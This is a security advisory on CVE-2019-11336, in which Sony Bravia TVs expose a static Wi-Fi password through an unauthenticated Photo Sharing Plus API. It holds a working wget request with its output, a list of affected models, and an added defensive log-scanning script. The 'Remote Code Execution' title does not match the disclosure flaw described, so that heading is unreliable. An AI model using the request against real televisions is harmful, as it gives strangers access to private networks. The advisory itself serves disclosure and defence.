Sony XBR-77A1E Remote Code Execution Vulnerability

Summary

Sony Bravia Smart TV devices allow remote attackers to retrieve the static Wi-Fi password (used when the TV is acting as an access point) by using the Photo Sharing Plus application to execute a backdoor API command, a different vulnerability than CVE-2019-10886.

Credit:

The information has been provided by xen1thLabs.
The original article can be found at: http://seclists.org/fulldisclosure/2019/Apr/32


Details

An unauthenticated remote attacker can retrieve the plaintext wireless password through the “Photo Sharing Plus” API.

After starting the application, the following example retrieves the wireless password generated by the TV (the TV's IP address is 192.168.1.102) over the LAN, without authentication:

```
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' \
  http://[ip_tv]:10000/contentshare/
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

The password is 8362tbwX.

By reading the TV's logs, we can confirm that the password was delivered over HTTP, without authentication. The logs contain the password in plaintext:

```
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send:
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

It is also important to note that the wireless password generated by the TV is always the same. Even after a hard reboot and disconnection from the power supply, the generated password does not change. This lack of randomness is also a security issue.
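The following added example (not part of the original advisory, and not Sony's or xen1thLabs' code) scans TV logs in the format shown above for responses that carry a non-empty Wi-Fi key, and flags any SSID whose key is identical across observations, which is the static-password symptom described here. The sample log is constructed, and the function names are assumptions made for the illustration.

```python
import json
import re

# Line shape taken from the advisory's log excerpt; the JSON body may follow
# "send:" on the same line or be wrapped onto the next one.
SEND_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*?HttpEndPoint: send:\s*(?P<body>\{.*)$",
    re.MULTILINE,
)

def find_key_disclosures(log_text):
    """Return one finding per logged response that carries a non-empty Wi-Fi key."""
    findings = []
    for m in SEND_RE.finditer(log_text):
        try:
            msg = json.loads(m.group("body"))
        except json.JSONDecodeError:
            continue  # truncated or non-JSON payload
        results = msg.get("result") if isinstance(msg, dict) else None
        for item in results if isinstance(results, list) else []:
            if isinstance(item, dict) and item.get("key"):
                findings.append({"ts": m.group("ts"),
                                 "ssid": item.get("ssid", ""),
                                 "key": item["key"]})
    return findings

def reused_keys(findings):
    """SSIDs whose key was identical at more than one timestamp (static-key symptom)."""
    seen = {}
    for f in findings:
        seen.setdefault((f["ssid"], f["key"]), set()).add(f["ts"])
    return sorted(ssid for (ssid, _key), stamps in seen.items() if len(stamps) > 1)

# Constructed sample log (values are made up, layout follows the advisory).
SAMPLE_LOG = r"""
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send:
{"result":[{"ssid":"DIRECT-XX-EXAMPLE","keyType":"","key":"ExampleKey1","url":"http:\/\/192.0.2.1"}],"id":80}
01-01 07:48:01.112 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"","key":""}],"id":81}
01-02 09:15:40.004 6021 19002 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-XX-EXAMPLE","key":"ExampleKey1"}],"id":80}
01-02 09:16:02.500 6021 19002 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-XX-EXA
"""

if __name__ == "__main__":
    hits = find_key_disclosures(SAMPLE_LOG)
    for h in hits:
        # Report the exposure without copying the secret into another log.
        print(f'{h["ts"]} ssid={h["ssid"]} key=<{len(h["key"])} chars redacted>')
    print("static key suspected for:", reused_keys(hits))
```

Comparing findings from logs captured before and after a power cycle is what makes the reuse check meaningful; a single capture only shows the plaintext disclosure.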

Vulnerable Systems:

  • Sony XBR-77A1E
  • Sony XBR-75Z9D
  • Sony XBR-75X945C
  • Sony XBR-75X940E
  • Sony XBR-75X940D
  • Sony XBR-75X940C
  • Sony XBR-75X910C
  • Sony XBR-75X900E
  • Sony XBR-75X857D
  • Sony XBR-75X855D
  • Sony XBR-75X855C
  • Sony XBR-75X850E
  • Sony XBR-75X850D
  • Sony XBR-75X850C
  • Sony XBR-65Z9D
  • Sony XBR-65X937D
  • Sony XBR-65X935D
  • Sony XBR-65X930E
  • Sony XBR-65X930D
  • Sony XBR-65X930C
  • Sony XBR-65X907C
  • Sony XBR-65X905C
  • Sony XBR-65X900E
  • Sony XBR-65X900C
  • Sony XBR-65X857D
  • Sony XBR-65X857C
  • Sony XBR-65X855D
  • Sony XBR-65X855C
  • Sony XBR-65X850E
  • Sony XBR-65X850D
  • Sony XBR-65X850C
  • Sony XBR-65X810C
  • Sony XBR-65X809C
  • Sony XBR-65X807C
  • Sony XBR-65X805C
  • Sony XBR-65X800C
  • Sony XBR-65X750D
  • Sony XBR-65A1E
  • Sony XBR-55X930E
  • Sony XBR-55X930D
  • Sony XBR-55X907C
  • Sony XBR-55X905C
  • Sony XBR-55X900E
  • Sony XBR-55X900C
  • Sony XBR-55X857D
  • Sony XBR-55X857C
  • Sony XBR-55X855D
  • Sony XBR-55X855C
  • Sony XBR-55X850D
  • Sony XBR-55X850C
  • Sony XBR-55X810C
  • Sony XBR-55X809C
  • Sony XBR-55X807C
  • Sony XBR-55X806E
  • Sony XBR-55X805C
  • Sony XBR-55X800E
  • Sony XBR-55X700D
  • Sony XBR-55A1E
  • Sony XBR-49X900E
  • Sony XBR-49X839C
  • Sony XBR-49X837C
  • Sony XBR-49X835D
  • Sony XBR-49X835C
  • Sony XBR-49X830C
  • Sony XBR-49X800E
  • Sony XBR-49X800D
  • Sony XBR-49X800C
  • Sony XBR-49X700D
  • Sony XBR-43X830C
  • Sony XBR-43X800E
  • Sony XBR-43X800D
  • Sony XBR-100Z9D
  • Sony X7500D
  • Sony Photo Sharing Plus PKG6.560
  • Sony Photo Sharing Plus PKG6.2858
  • Sony Photo Sharing Plus PKG6.2671
  • Sony Photo Sharing Plus PKG5.381
  • Sony Photo Sharing Plus PKG3925
  • Sony Photo Sharing Plus PKG3885
  • Sony Photo Sharing Plus PKG3865
  • Sony KDL-75W855C
  • Sony KDL-75W850C
  • Sony KDL-65W857C
  • Sony KDL-65W855C
  • Sony KDL-65W850C
  • Sony KDL-55W805C
  • Sony KDL-55W800C
  • Sony KDL-50W820C
  • Sony KDL-50W809C
  • Sony KDL-50W807C
  • Sony KDL-50W805C
  • Sony KDL-50W800C

CVE Information:
CVE-2019-11336

Disclosure Timeline:
Publish Date: 05/14/2019